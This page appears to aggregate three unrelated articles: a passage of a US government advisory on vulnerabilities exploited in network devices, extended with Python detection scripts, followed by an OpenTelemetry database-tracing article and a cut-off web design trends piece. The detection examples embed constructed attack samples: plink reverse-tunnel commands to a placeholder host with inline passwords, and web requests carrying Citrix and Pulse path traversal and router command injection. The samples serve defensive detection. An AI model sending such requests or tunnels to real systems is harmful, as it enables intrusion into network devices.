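the attached form '-R3389:...', and reports what a responder needs: the
VPS the tunnel terminates on, which internal host:port it exposes, and
whether the password travelled on the command line with -pw.  Added
example, not from the advisory; the command lines are constructed."""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

PLINK_IMAGE = re.compile(r"(?:^|[\\/])plink(?:\.exe)?$", re.IGNORECASE)
FORWARD_FLAGS = {"-R": "reverse", "-L": "local"}
FLAGS_WITH_VALUE = {"-pw", "-P", "-l", "-i", "-hostkey", "-load"}   # consume the next token


@dataclass
class TunnelFinding:
    image: str
    mode: Optional[str]      # "reverse", "local", or None for a plain session
    listen: Optional[str]    # [ip:]port that accepts connections
    target: Optional[str]    # host:port the tunnel forwards to
    remote: str              # [user@]host the SSH session goes to
    remote_port: int
    inline_password: bool    # -pw <secret> on the command line
    no_shell: bool           # -N: tunnel only, no interactive shell


def parse_plink(cmdline: str) -> Optional[TunnelFinding]:
    # posix=False keeps Windows backslashes intact; surrounding quotes are stripped after.
    argv = [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]
    if not argv or not PLINK_IMAGE.search(argv[0]):
        return None
    mode = listen = target = remote = None
    remote_port, inline_password, no_shell = 22, False, False
    i = 1
    while i < len(argv):
        tok = argv[i]
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if tok in FORWARD_FLAGS or (len(tok) > 2 and tok[:2] in FORWARD_FLAGS):
            flag, spec = (tok, nxt) if tok in FORWARD_FLAGS else (tok[:2], tok[2:])
            i += 2 if tok in FORWARD_FLAGS else 1
            mode = FORWARD_FLAGS[flag]
            parts = spec.split(":")           # [listen-ip:]listen-port:host:port
            target, listen = ":".join(parts[-2:]), ":".join(parts[:-2])
        elif tok == "-pw":
            inline_password, i = True, i + 2
        elif tok == "-P":
            remote_port, i = int(nxt), i + 2
        elif tok in FLAGS_WITH_VALUE:
            i += 2
        elif tok == "-N":
            no_shell, i = True, i + 1
        elif tok.startswith("-"):             # -batch, -ssh, -v, ... take no value
            i += 1
        else:                                 # the first bare word is the destination
            remote, i = tok, i + 1
    if remote is None:
        return None
    return TunnelFinding(argv[0], mode, listen, target, remote, remote_port,
                         inline_password, no_shell)


def risk(f: TunnelFinding) -> str:
    score = 0
    if f.mode == "reverse":
        score += 2      # exposes an inside host to the remote end
    if f.inline_password:
        score += 1      # secret visible in process telemetry
    if f.no_shell:
        score += 1      # tunnel-only session, nobody typing
    if f.remote_port != 22:
        score += 1      # non-standard SSH port on the far side
    return "high" if score >= 3 else "medium" if score >= 1 else "low"


def scan(cmdlines: List[str]) -> List[Tuple[str, TunnelFinding]]:
    results = []
    for cmd in cmdlines:
        finding = parse_plink(cmd)
        if finding:
            results.append((risk(finding), finding))
    return results


# Constructed telemetry: two actor-style invocations, one legitimate admin forward,
# and an OpenSSH line this parser deliberately leaves to a separate rule.
SAMPLE_CMDLINES = [
    r'C:\Windows\Temp\plink.exe -N -R 3389:10.10.5.20:3389 -pw Passw0rd! -batch root@203.0.113.9 -P 2222',
    r'"C:\Program Files\PuTTY\plink.exe" -batch -ssh ops@bastion.corp.example -L 8443:10.10.5.30:443',
    r'C:\Windows\System32\OpenSSH\ssh.exe -N -R 3389:localhost:3389 user@example.net',
    r'plink.exe -R3389:10.10.5.21:3389 -pw hunter2 root@203.0.113.9 -P 2222 -N',
]

if __name__ == "__main__":
    for level, f in scan(SAMPLE_CMDLINES):
        print(f"{level:6} {f.mode} {f.listen} -> {f.target} via {f.remote}:{f.remote_port} "
              f"pw-inline={f.inline_password} no-shell={f.no_shell}")
```

The `-pw` flag is worth flagging on its own: the password sits in the process command line, so the same telemetry that reveals the tunnel also yields the credential the actor used on the VPS.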
Mitigations
NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:
Resources
Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.
U.S. government and critical infrastructure organizations should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.
U.S. Defense Industrial Base (DIB) organizations should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email dib_defense@cyber.nsa.gov.
Additional References
Contact Information
To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Media Inquiries / Press Desk:
Disclaimer of endorsement
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
Purpose
This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Appendix A: Vulnerabilities
Table 2: Information on Cisco CVE-2018-0171
Vulnerability Description
A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts:
- triggering a reload of the device
- allowing the attacker to execute arbitrary code on the device
- causing an indefinite loop on the affected device that triggers a watchdog crash
Vulnerable Technologies and Versions
The vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE Software and have the Smart Install client feature enabled. Only Smart Install client switches are affected.
References
http://www.securityfocus.com/bid/103538
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05
https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490
http://www.securitytracker.com/id/1040580
Table 3: Information on Cisco CVE-2019-15271
Vulnerability Description
A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.
Vulnerable Technologies and Versions
This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x
Table 4: Information on Cisco CVE-2019-1652
Vulnerability Description
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.
Vulnerable Technologies and Versions
This vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20.
References
http://www.securityfocus.com/bid/106728
https://seclists.org/bugtraq/2019/Mar/55
https://www.exploit-db.com/exploits/46243/
https://www.exploit-db.com/exploits/46655/
http://seclists.org/fulldisclosure/2019/Mar/61
http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html
http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Table 5: Information on Citrix CVE-2019-19781
Vulnerability Description
An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow directory traversal: a request under the unauthenticated /vpn/ path can reach scripts under /vpns/ that should require authentication, which is how the flaw was exploited in the wild for unauthenticated remote code execution.
Vulnerable Technologies and Versions
The vulnerability affects Citrix ADC and Citrix Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 on all supported platforms.
References
https://support.citrix.com/article/CTX267027
Table 6: Information on DrayTek CVE-2020-8515
Vulnerability Description
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
References
https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
Table 7: Information on D-Link CVE-2019-16920
Vulnerability Description
Unauthenticated remote code execution occurs in D-Link products such as the DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when an attacker sends arbitrary input to a "PingTest" device common gateway interface (CGI), which leads to command injection. An attacker who successfully triggers the command injection can achieve full system compromise. It was later found independently that the DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825 are also affected.
References
https://www.kb.cert.org/vuls/id/766427
https://fortiguard.com/zeroday/FG-VD-19-117
https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
https://www.seebug.org/vuldb/ssvid-98079
Table 8: Information on Fortinet CVE-2018-13382
Vulnerability Description
An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.
Vulnerable Technologies and Versions
This vulnerability affects the FortiOS and FortiProxy versions listed above.
FortiOS devices are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and SSL VPN users are configured with local authentication, since the crafted request changes a locally stored password.
References
https://fortiguard.com/psirt/FG-IR-18-389
https://fortiguard.com/advisory/FG-IR-18-389
https://www.fortiguard.com/psirt/FG-IR-20-231
Table 9: Information on Mikrotik CVE-2018-14847
Vulnerability Description
MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files, and remote authenticated attackers to write arbitrary files, due to a directory traversal vulnerability in the WinBox interface. Public exploits used the file read to retrieve the RouterOS user database and recover administrator credentials.
Vulnerable Technologies and Versions
This vulnerability affects MikroTik RouterOS releases through 6.42. Exploitation requires that the WinBox service (TCP port 8291) be reachable by the attacker, so restricting that port to management addresses limits exposure on devices that cannot be updated immediately.
References
https://blog.mikrotik.com/security/winbox-vulnerability.html
Table 10: Information on Netgear CVE-2017-6862
Vulnerability Description
NETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices before 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the administration webapp. The NETGEAR ID is PSV-2016-0261.
Vulnerable Technologies and Versions
This vulnerability affects the NETGEAR WNR2000v3, WNR2000v4, and WNR2000v5 firmware versions listed above.
References
https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261
https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf
http://www.securityfocus.com/bid/98740
Table 11: Information on Pulse CVE-2019-11510
Vulnerability Description
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to read arbitrary files from the appliance. The published exploitation chain used this file read to retrieve cached credentials and session data from the device.
Vulnerable Technologies and Versions
This vulnerability affects Pulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.
References
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
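Tables 5, 6, 7 and 11 all describe exploitation through a single crafted HTTP request to a VPN or management interface, which is what makes these attacks visible in ordinary web-server access logs. The following is an added example, not part of the advisory and not a vendor's tooling: a Python scanner that parses Common Log Format lines, URL-decodes the request target (twice, to catch double encoding), and matches the publicly reported request shapes for CVE-2019-19781, CVE-2019-11510, CVE-2020-8515, and CVE-2019-16920. The log lines are constructed for the example; the D-Link "ping_test" parameter name and the DrayTek shell-metacharacter heuristic are assumptions about the request shape, not data from the advisory.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines for the example; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2020:03:14:07 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 1024
203.0.113.5 - - [10/Jan/2020:03:14:09 +0000] "POST /vpn/..%2fvpns/portal/scripts/newbm.pl HTTP/1.1" 200 97
198.51.100.7 - - [22/Aug/2019:11:02:33 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 2213
198.51.100.9 - - [30/Mar/2020:08:45:10 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=x%3Bid HTTP/1.1" 200 12
192.0.2.11 - - [01/Oct/2019:19:20:01 +0000] "POST /apply_sec.cgi?action=ping_test&ping_ipaddr=127.0.0.1%3Bid HTTP/1.1" 200 40
192.0.2.20 - - [01/Oct/2019:19:21:15 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
192.0.2.21 - - [01/Oct/2019:19:22:15 +0000] "GET /vpn/index.html HTTP/1.1" 200 3300
"""

# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that have no place in a router CGI query string ('&' is a legitimate separator).
SHELL_META = re.compile(r"[;|`\n]|\$\(")


def normalize_target(target: str) -> str:
    """URL-decode twice (defeats double encoding) and case-fold for matching."""
    return unquote(unquote(target)).lower()


def _split(target: str):
    path, _, query = target.partition("?")
    return path, query


def is_citrix_19781(method: str, target: str) -> bool:
    # Traversal from the unauthenticated /vpn/ tree into /vpns/ (CTX267027).
    return "/vpn/../vpns/" in target


def is_pulse_11510(method: str, target: str) -> bool:
    # Traversal through the html5acc/guacamole path used for arbitrary file read (SA44101).
    return "/dana-na/../dana/html5acc/guacamole/../" in target


def is_draytek_8515(method: str, target: str) -> bool:
    # Heuristic (assumption): any shell metacharacter in a mainfunction.cgi query is worth review.
    path, query = _split(target)
    return path.endswith("/cgi-bin/mainfunction.cgi") and bool(SHELL_META.search(query))


def is_dlink_16920(method: str, target: str) -> bool:
    # "ping_test" is the assumed action name behind the PingTest CGI named in VU#766427.
    path, query = _split(target)
    return path.endswith("/apply_sec.cgi") and "ping_test" in query


SIGNATURES = [
    ("CVE-2019-19781", is_citrix_19781),
    ("CVE-2019-11510", is_pulse_11510),
    ("CVE-2020-8515", is_draytek_8515),
    ("CVE-2019-16920", is_dlink_16920),
]


def scan_access_log(text: str) -> list:
    """Return one hit dict per (line, signature) match; lines that do not parse are skipped."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        target = normalize_target(m["target"])
        for cve, check in SIGNATURES:
            if check(m["method"], target):
                hits.append({"line": lineno, "ip": m["ip"], "cve": cve,
                             "method": m["method"], "target": m["target"]})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f"line {h['line']}: {h['cve']} from {h['ip']} ({h['method']} {h['target']})")
```

Run it over an exported access log from the reverse proxy or the appliance itself. A hit is an indicator, not proof of compromise, and an empty result is not proof of absence: attackers can vary traversal sequences or move the payload into a POST body, and vulnerabilities exploited entirely through the request body (the FortiOS SSL VPN password change in Table 8, the QNAP issues in Tables 13 to 16) leave nothing distinctive in a request line. Treat any match on an internet-facing device as a trigger to compare the running firmware against the affected ranges in these tables and to pull the device's own logs.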
Table 12: Information on Pulse CVE-2021-22893
Vulnerability Description
Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.
Vulnerable Technologies and Versions
This vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.
References
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
https://blog.pulsesecure.net/pulse-connect-secure-security-update/
https://kb.cert.org/vuls/id/213092
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/
https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html
Table 13: Information on QNAP CVE-2019-7192
Vulnerability Description
This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix this vulnerability, QNAP recommends updating Photo Station to the latest version.
Recommended Mitigations
Update Photo Station to the fixed versions listed in the QNAP advisory referenced below.
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 14: Information on QNAP CVE-2019-7193
Vulnerability Description
This improper input validation vulnerability allows remote attackers to inject arbitrary code into the system. To fix this vulnerability, QNAP recommends updating QTS to the latest version.
Recommended Mitigations
Update QTS to the fixed versions listed in the QNAP advisory referenced below.
Vulnerable Technologies and Versions
This vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 15: Information on QNAP CVE-2019-7194
Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix this vulnerability, QNAP recommends updating Photo Station to the latest version.
Recommended Mitigations
Update Photo Station to the fixed versions listed in the QNAP advisory referenced below.
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 16: Information on QNAP CVE-2019-7195
Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix this vulnerability, QNAP recommends updating Photo Station to the latest version.
Recommended Mitigations
Update Photo Station to the fixed versions listed in the QNAP advisory referenced below.
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 17: Information on Zyxel CVE-2020-29583
Vulnerability Description
Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware, so it is identical on every device running that release. An attacker can use this account to log in to the SSH server or the web interface with administrative privileges.
Vulnerable Technologies and Versions
This vulnerability affects Zyxel devices running firmware version 4.60 as described above; see the Zyxel advisory referenced below for the full list of affected products and the patched firmware.
References
http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release
https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15
https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
https://www.zyxel.com/support/CVE-2020-29583.shtml
https://www.zyxel.com/support/security_advisories.shtml
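As an added example, not from the advisory and not Zyxel's own tooling, the following Python script shows the kind of check that surfaces an account like the one described above: it pulls printable strings out of a firmware image, parses any passwd-format entries it finds, and reports accounts that are undocumented, accounts with a usable (non-shadowed) password field and UID 0, and plaintext credential assignments. The firmware blob and the account names in it are constructed for the example; the documented-account list is an assumption that you would replace with the vendor's published defaults.

```python
import re

# Constructed firmware blob: binary noise around an embedded passwd-style table
# and a config fragment. Not taken from any real image.
FIRMWARE = (
    b"\x7fELF\x01\x01\x01\x00" * 4
    + b"root:x:0:0:root:/root:/bin/sh\n"
    + b"admin:$1$abcdefgh$0123456789abcdefghijkl:0:0:Administrator:/root:/bin/sh\n"
    + b"svc_hidden:$1$zzzzzzzz$ABCDEFGHIJKLMNOPQRSTUV:0:0:undocumented:/:/bin/sh\n"
    + b"nobody:x:65534:65534:nobody:/nonexistent:/bin/false\n"
    + b"\x00\x00support_password=Pl@intextPw\x00"
    + b"\xff\xfe" * 8
)

# Accounts the vendor documents for this image (assumption; use the vendor's own list).
DOCUMENTED_ACCOUNTS = frozenset({"root", "admin", "nobody"})

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{8,}")
PASSWD_LINE = re.compile(r"^([a-z_][a-z0-9_-]*):([^:]*):(\d+):(\d+):([^:]*):([^:]*):([^:]*)$")
CRED_ASSIGN = re.compile(r"^([\w.-]*(?:pass|pwd|secret)[\w.-]*)\s*[=:]\s*(\S+)$", re.IGNORECASE)
# Password-field values that mean "no password here" (shadowed or locked).
NO_LOGIN = {"", "x", "*", "!", "!!", "*LK*"}


def printable_strings(blob: bytes):
    """Like strings(1): yield printable ASCII runs of at least 8 bytes."""
    for m in PRINTABLE_RUN.finditer(blob):
        yield m.group().decode("ascii")


def find_passwd_entries(blob: bytes) -> list:
    """Parse every passwd-format line found anywhere in the image."""
    entries = []
    for s in printable_strings(blob):
        m = PASSWD_LINE.match(s)
        if m:
            name, pw, uid, gid, _gecos, _home, shell = m.groups()
            entries.append({
                "name": name, "uid": int(uid), "shell": shell,
                # A hash or cleartext in field 2 means the image itself carries the credential.
                "login_capable": pw not in NO_LOGIN,
            })
    return entries


def find_plaintext_credentials(blob: bytes) -> list:
    """key=value / key:value strings whose key looks like a password or secret."""
    return [(m.group(1), m.group(2))
            for s in printable_strings(blob)
            if (m := CRED_ASSIGN.match(s))]


def audit_firmware(blob: bytes, documented=DOCUMENTED_ACCOUNTS) -> list:
    """Return (finding, subject) pairs in the order the evidence appears in the image."""
    findings = []
    for acct in find_passwd_entries(blob):
        if acct["name"] not in documented:
            findings.append(("undocumented-account", acct["name"]))
        if acct["login_capable"] and acct["uid"] == 0:
            findings.append(("root-login-account", acct["name"]))
    for key, _value in find_plaintext_credentials(blob):
        findings.append(("plaintext-credential", key))
    return findings


if __name__ == "__main__":
    for finding, subject in audit_firmware(FIRMWARE):
        print(f"{finding}: {subject}")
```

Run it against the unpacked root filesystem or the raw image; it does not decompress anything, so use binwalk or the vendor's unpacker first if the image is compressed. A UID-0 account with an embedded password hash is what CVE-2020-29583 looked like from the outside: the credential is in the image, every device running that image shares it, and no configuration change removes it; only a firmware update does.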
Article source: us-cert.gov
OpenTelemetry in Action: Optimizing Database Operations
Many software developers can attest that some of the most significant issues in their applications arise from database performance. Though many developers prefer a relational database for enterprise applications, typical logging and monitoring solutions provide few signals for detecting database performance issues. Rooting out common bad practices, such as chatty interactions between the application code and the database, is non-trivial.
As developers, we need to understand how our database is performing from the context of user transactions. Ideally, we would have a common tool that can monitor the performance of both the application and the database concerning user transactions. OpenTelemetry has emerged as a popular tool for application monitoring, but it can also be extended for monitoring databases.
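The point above is that a query is only interpretable in the context of the user transaction that issued it. The following is an added example, not code from the DZone article: a self-contained Python tracer that stands in for the OpenTelemetry SDK so it runs offline (the attribute names db.system and db.statement follow the OpenTelemetry database semantic conventions of the time), a wrapper that turns every query into a child span of the current request span, and a report that flags the N+1 pattern by counting repeated statements per transaction. The schema, the request handler, and the threshold are constructed for the example.

```python
import re
import sqlite3
import time
from collections import Counter
from contextlib import contextmanager
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Span:
    """Minimal stand-in for an OpenTelemetry span: name, parent, attributes, timing."""
    name: str
    parent: Optional["Span"] = None
    attributes: dict = field(default_factory=dict)
    start: float = field(default_factory=time.perf_counter)
    end: Optional[float] = None

    @property
    def duration_ms(self) -> float:
        finish = self.end if self.end is not None else time.perf_counter()
        return (finish - self.start) * 1000


class Tracer:
    """Records spans with parent/child context, like an OTel tracer with an in-memory exporter."""

    def __init__(self):
        self.spans: list = []
        self._stack: list = []

    @contextmanager
    def span(self, name: str, **attributes):
        s = Span(name, parent=self._stack[-1] if self._stack else None, attributes=attributes)
        self.spans.append(s)
        self._stack.append(s)
        try:
            yield s
        finally:
            s.end = time.perf_counter()
            self._stack.pop()


class TracedConnection:
    """Wraps a DB-API connection so every query becomes a child span of the current request span.
    Only the parameterised statement is recorded (db.statement), never the bound values, so
    customer data does not leak into telemetry."""

    def __init__(self, conn, tracer: Tracer):
        self._conn, self._tracer = conn, tracer

    def execute(self, sql: str, params=()):
        with self._tracer.span("db.query", **{"db.system": "sqlite", "db.statement": sql}):
            return self._conn.execute(sql, params)


def normalize_sql(sql: str) -> str:
    """Collapse literals so queries that differ only in values group together."""
    return re.sub(r"'[^']*'|\b\d+\b", "?", sql)


def chatty_transactions(tracer: Tracer, threshold: int = 5) -> list:
    """Per root span (one user transaction), report statements repeated at least `threshold`
    times: the N+1 pattern that per-query logging hides."""
    report = []
    for root in (s for s in tracer.spans if s.parent is None):
        counts = Counter(normalize_sql(c.attributes["db.statement"])
                         for c in tracer.spans if c.parent is root and c.name == "db.query")
        report.extend((root.name, stmt, n) for stmt, n in counts.items() if n >= threshold)
    return report


def build_db() -> sqlite3.Connection:
    """Constructed schema and data: ten orders with one item each."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders(id INTEGER PRIMARY KEY)")
    conn.execute("CREATE TABLE items(order_id INTEGER, sku TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?)", [(i,) for i in range(1, 11)])
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(i, f"SKU-{i}") for i in range(1, 11)])
    return conn


def handle_list_orders(db: TracedConnection, tracer: Tracer) -> list:
    """A request handler with the classic chatty pattern: one extra query per order for its items."""
    with tracer.span("GET /orders"):
        orders = db.execute("SELECT id FROM orders").fetchall()
        return [(oid, [r[0] for r in db.execute("SELECT sku FROM items WHERE order_id = ?", (oid,)).fetchall()])
                for (oid,) in orders]


def demo() -> list:
    tracer = Tracer()
    db = TracedConnection(build_db(), tracer)
    handle_list_orders(db, tracer)
    return chatty_transactions(tracer, threshold=5)


if __name__ == "__main__":
    for request, stmt, n in demo():
        print(f"{request}: '{stmt}' executed {n} times in one transaction")
```

With a real OpenTelemetry SDK the same shape applies: the request span comes from the HTTP instrumentation, the database instrumentation emits child spans carrying db.statement, and the report runs over exported spans grouped by trace ID rather than over an in-memory list. Keep the decision to record only the parameterised statement; bound values in telemetry are a data-exposure path in their own right.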
Article source: DZONE
3 Essential Design Trends, June 2022
Are you bored with some of your current design projects? This month's collection of website design trends can help break you out of that rut with some fun and funky alternatives.
And all of these options are anything but boring. From visual display to technique, these trends present a different set of challenges.
Here’s what’s trending in design this month.
1. Layers on Layers
These website designs have so many layers of information that you almost don’t know where to look or where the design elements start and stop.
This can be a complex technique to make work because of the number of elements competing for the same attention in the design.
What you are likely to see with this design trend is an image or video background with some motion, but nothing that truly demands attention. Then a few still images in smaller frames are added throughout the design, and text is layered on top for a three-deep effect.
If you interact with these designs, you’ll find that they are not flat either. They all include animated elements, hover states, and interactions that help direct you through the layers of what can be a somewhat complex design.
Western National Parks Association uses a background image, middle images with animations, and multiple text layers (some on the pictures and some on the background). There’s also scroll animation to help build the design. A lot is going on, but it does not feel too busy.
WIP Architects is another design with layers that interact with each other and include motion. With a lot of scroll animation and layers that go in front of and behind other elements, engagement helps this site work.
The Shipwreck Survey uses the same basic layer outline with a little more overlap between elements and less overall animation. The primary animated effect on the homepage is the scroll bar.
2. Directed Click Actions
This interesting website design trend can be incredibly useful or a wasted element – directed click actions. These are buttons, icons, and animations that tell you to click somewhere in the design to move to the next stage of interaction.
The direct approach ensures that users see and have the best possible chance of doing what the design is intended for. On the other hand, if you need this much instruction, is the design too complicated? Or is there a middle ground where this trend looks great and is usable?
In each of the examples below, these directed click actions are a bit different.
HUG Co has a big circle to click in the bottom third of the screen. It’s almost designed like a bullseye, and you can’t miss it. The thing that is interesting here is that most of the video falls below the scroll. The click action also has two emojis to denote action – a smiling face or pointer when you are ready to click. (The click extends the video to full screen.)
ThinkOvery also uses a similar circular click icon. It also takes you to the next screen in a single movement so that you can continue to explore the design.
